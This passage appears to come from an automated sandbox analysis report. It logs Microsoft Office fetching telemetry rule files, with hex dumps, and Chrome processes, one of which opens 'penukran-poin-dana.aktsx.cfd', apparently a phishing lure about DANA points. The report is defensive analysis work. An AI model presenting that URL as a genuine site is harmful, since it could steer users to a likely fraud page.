                                                                                                                            2024-10-06 11:50:30 UTC192OUTGET /rules/rule702950v1s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-10-06 11:50:30 UTC563INHTTP/1.1 200 OK
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:30 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 1368
                                                                                                                            Connection: close
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                                            ETag: "0x8DC582BDDC22447"
                                                                                                                            x-ms-request-id: 173e0f62-801e-00a3-24fe-167cfb000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241006T115030Z-1657d5bbd48brl8we3nu8cxwgn000000027g000000009sv1
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-10-06 11:50:30 UTC1368INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 72 61 6e 73 6c 61 74 6f 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702950" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTranslator" S="Medium" /> <F T=


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            143192.168.2.64988713.107.246.60443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:30 UTC192OUTGET /rules/rule701151v1s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-10-06 11:50:30 UTC563INHTTP/1.1 200 OK
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:30 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 1401
                                                                                                                            Connection: close
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                                                                                            ETag: "0x8DC582BE055B528"
                                                                                                                            x-ms-request-id: 6bee43b5-001e-00a2-2106-17d4d5000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241006T115030Z-1657d5bbd48xdq5dkwwugdpzr0000000028g0000000074r4
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-10-06 11:50:30 UTC1401INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextA


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            144192.168.2.64988413.107.246.60443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:30 UTC192OUTGET /rules/rule702951v1s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-10-06 11:50:30 UTC563INHTTP/1.1 200 OK
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:30 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 1405
                                                                                                                            Connection: close
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                            ETag: "0x8DC582BE12B5C71"
                                                                                                                            x-ms-request-id: 6f1c5b1d-901e-0048-485a-17b800000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241006T115030Z-1657d5bbd48tnj6wmberkg2xy80000000240000000000n6h
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-10-06 11:50:30 UTC1405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702951" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            145192.168.2.64988813.107.246.60443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:30 UTC192OUTGET /rules/rule701150v1s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-10-06 11:50:30 UTC563INHTTP/1.1 200 OK
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:30 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 1364
                                                                                                                            Connection: close
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                            ETag: "0x8DC582BE1223606"
                                                                                                                            x-ms-request-id: 04600955-801e-00ac-55f4-16fd65000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241006T115030Z-1657d5bbd48xsz2nuzq4vfrzg800000001qg00000000fwba
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-10-06 11:50:30 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41 6e 64 46 6f 6e 74 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextAndFonts" S="Medium" /> <F T="2">


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            146192.168.2.64988913.107.246.60443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:30 UTC192OUTGET /rules/rule702201v1s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-10-06 11:50:30 UTC563INHTTP/1.1 200 OK
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:30 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 1397
                                                                                                                            Connection: close
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:56 GMT
                                                                                                                            ETag: "0x8DC582BE7262739"
                                                                                                                            x-ms-request-id: 4035d6e2-a01e-0002-4602-175074000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241006T115030Z-1657d5bbd487nf59mzf5b3gk8n00000001mg0000000065qh
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-10-06 11:50:30 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTel


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            147192.168.2.64989113.107.246.60443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:30 UTC192OUTGET /rules/rule700401v2s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-10-06 11:50:30 UTC563INHTTP/1.1 200 OK
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:30 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 1403
                                                                                                                            Connection: close
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                                            ETag: "0x8DC582BDCB4853F"
                                                                                                                            x-ms-request-id: 87e26173-201e-0051-15e7-167340000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241006T115030Z-1657d5bbd48wd55zet5pcra0cg00000001u000000000eh1e
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-10-06 11:50:30 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 31 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700401" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            148192.168.2.64989013.107.246.60443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:30 UTC192OUTGET /rules/rule702200v1s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-10-06 11:50:30 UTC563INHTTP/1.1 200 OK
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:30 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 1360
                                                                                                                            Connection: close
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                                            ETag: "0x8DC582BDDEB5124"
                                                                                                                            x-ms-request-id: 62f7f1ae-f01e-0096-4d0c-1710ef000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241006T115030Z-1657d5bbd48p2j6x2quer0q028000000025g000000005azu
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-10-06 11:50:30 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 6c 4d 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTellMe" S="Medium" /> <F T="2">


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            149192.168.2.64989213.107.246.60443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:30 UTC192OUTGET /rules/rule700400v2s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-10-06 11:50:30 UTC563INHTTP/1.1 200 OK
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:30 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 1366
                                                                                                                            Connection: close
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT
                                                                                                                            ETag: "0x8DC582BDB779FC3"
                                                                                                                            x-ms-request-id: 52963dc7-601e-0084-0e74-176b3f000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241006T115030Z-1657d5bbd48dfrdj7px744zp8s00000001s0000000004ars
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-10-06 11:50:30 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 30 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 65 6d 65 74 72 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700400" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTelemetry" S="Medium" /> <F T="2


                                                                                                                            Click to jump to process

                                                                                                                            Click to jump to process

                                                                                                                            Click to jump to process

                                                                                                                            Target ID:0
                                                                                                                            Start time:07:49:56
                                                                                                                            Start date:06/10/2024
                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                                                                                                            Imagebase:0x7ff684c40000
                                                                                                                            File size:3'242'272 bytes
                                                                                                                            MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:low
                                                                                                                            Has exited:false

                                                                                                                            Target ID:2
                                                                                                                            Start time:07:50:01
                                                                                                                            Start date:06/10/2024
                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2320 --field-trial-handle=2224,i,8753130838461143343,2683393986688760850,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                            Imagebase:0x7ff684c40000
                                                                                                                            File size:3'242'272 bytes
                                                                                                                            MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:low
                                                                                                                            Has exited:false

                                                                                                                            Target ID:3
                                                                                                                            Start time:07:50:03
                                                                                                                            Start date:06/10/2024
                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "http://penukran-poin-dana.aktsx.cfd/"
                                                                                                                            Imagebase:0x7ff684c40000
                                                                                                                            File size:3'242'272 bytes
                                                                                                                            MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:low
                                                                                                                            Has exited:true

                                                                                                                            No disassembly